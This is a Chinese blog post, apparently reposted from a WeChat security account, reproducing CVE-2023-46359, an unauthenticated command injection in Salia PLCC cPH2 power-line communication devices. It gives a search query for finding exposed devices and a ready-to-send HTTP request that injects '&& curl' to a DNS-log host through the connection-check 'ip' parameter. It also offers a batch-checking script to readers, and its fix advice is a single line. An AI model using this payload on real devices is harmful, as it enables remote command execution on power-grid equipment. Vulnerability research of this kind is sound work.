漏洞复现-CVE-2023-46359

admin 2024年3月11日16:19:27评论38 views字数 1011阅读3分22秒阅读模式
免责声明

文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

一:漏洞描述

Salia PLCC 提供的产品包括通信模块、智能电表、数据采集设备等,旨在帮助用户实现电力系统的远程监控、数据传输和智能化管理。他们的解决方案可以提高能源利用效率,改善电力系统的稳定性和可靠性。

该产品的Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

二:漏洞影响版本

Salia PLCC cPH2 v<= 1.87.0版本

三:网络空间测绘查询

"Salia PLCC"

漏洞复现-CVE-2023-46359

漏洞复现-CVE-2023-46359

五:漏洞复现

POC:

GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F[Dnslog] HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

使用DNSlog生成一个域名,替换POC中【DNSLog】内容

漏洞复现-CVE-2023-46359

收到DNS解析记录

漏洞复现-CVE-2023-46359

六:批量检测 

漏洞复现-CVE-2023-46359

七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
关注【Adler学安全】公众号
发送0311】键字获取批量验证脚本
发送【工具】获取渗透测试工具
发送【交流群1】加入交流群

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2023-46359

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月11日16:19:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2023-46359http://cn-sec.com/archives/2566648.html

发表评论

匿名网友 填写信息